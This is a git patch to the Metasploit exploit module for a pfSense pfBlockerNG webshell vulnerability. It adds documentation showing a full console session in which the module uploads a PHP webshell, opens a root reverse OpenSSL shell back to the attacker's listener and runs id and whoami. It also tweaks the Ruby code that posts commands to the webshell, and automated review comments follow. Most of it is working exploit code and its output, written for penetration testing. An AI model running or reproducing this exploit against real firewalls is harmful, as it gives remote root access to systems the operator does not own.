From a3e32ffafa9ec2ba500d43eb342d7f0396afe3ab Mon Sep 17 00:00:00 2001
From: Grant Willcox
Date: Wed, 12 Oct 2022 19:23:59 -0500
Subject: [PATCH] Add TARGET 0 to documentation
---
 .../unix/http/pfsense_pfblockerng_webshell.md | 63 +++++++++++++++++++
 .../unix/http/pfsense_pfblockerng_webshell.rb | 4 +-
 2 files changed, 65 insertions(+), 2 deletions(-)
diff --git a/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md b/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
index 03f99c2b96..761ba5d56e 100644
--- a/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
+++ b/documentation/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
@@ -122,5 +122,68 @@ whoami root uname -a FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE fd0f54f44b5c(RELENG_2_5_0) pfSense amd64 +exit +msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set TARGET 0 +TARGET => 0 +msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > show options + +Module options (exploit/unix/http/pfsense_pfblockerng_webshell): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS 172.23.40.111 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit + RPORT 443 yes The target port (TCP) + SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to + listen on all addresses. + SRVPORT 9933 yes The local port to listen on. + SSL true no Negotiate SSL/TLS for outgoing connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + URIPATH no The URI to use for this exploit (default is random) + VHOST no HTTP server virtual host + WEBSHELL_NAME no The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unse + t. + + +Payload options (cmd/unix/reverse_openssl): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 172.23.47.143 yes The listen address (an interface may be specified) + LPORT 4545 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Unix Command + + +msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run + +[*] Started reverse double SSL handler on 172.23.47.143:4545 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Uploading shell... +[*] Webshell name is: jIuhcpoe.php +[+] The target is vulnerable. +[*] Executing Unix Command for cmd/unix/reverse_openssl +[*] Accepted the first client connection... 
+[*] Accepted the second client connection... +[*] Command: echo XqZbye7zG7tGBVWc; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket B +[*] B: "XqZbye7zG7tGBVWc\n" +[*] Matching... +[*] A is input... +[+] Deleted /usr/local/www/jIuhcpoe.php +[*] Command shell session 2 opened (172.23.47.143:4545 -> 172.23.40.111:33941) at 2022-10-12 19:22:13 -0500 + +id +uid=0(root) gid=0(wheel) groups=0(wheel) +whoami +root ```
diff --git a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
index 45af603555..73093bd0f6 100644
--- a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
+++ b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
@@ -111,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'method' => 'POST',
 'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"),
 'vars_post' => {
- "#{@parameter_name}" => 'id'
+ @parameter_name.to_s => 'id'
 }
 )
 return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || check_resp.body.nil? || !check_resp.body.include?('uid=0(root) gid=0(wheel)')
@@ -127,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8'
 },
 'vars_post' => {
- "#{@parameter_name}" => cmd
+ @parameter_name.to_s => cmd
 }
 })
 end
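Review bot: The `return Exploit::CheckCode::Safe(...)` line closing the `@@ -111,7` hunk reports the host as safe when `check_resp` is nil, so a timeout or dropped connection is recorded as "likely patched". For anyone using the check result to judge exposure that is a false negative. A missing response should be split out first, e.g. `return Exploit::CheckCode::Unknown('No response from the target.') if check_resp.nil?`, leaving `Safe` for a response that lacks the expected `id` output. The match on the literal `uid=0(root) gid=0(wheel)` also presumably assumes the web server runs as root, which deserves a one-line comment. The enclosing method starts and ends outside the hunk.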
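Review bot: The context line `'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8'` in the `@@ -127,7` hunk puts a media type into the header that names content codings such as gzip; the header that carries a form media type is `Content-Type`. Because the request already passes `vars_post`, the HTTP client presumably sets the form content type itself, so the entry looks like it can be dropped rather than renamed. On the changed line, `@parameter_name.to_s` is only needed if the variable can hold something other than a String. Its assignment is outside the hunk, so a short comment there stating its type would let the key be written as plain `@parameter_name`.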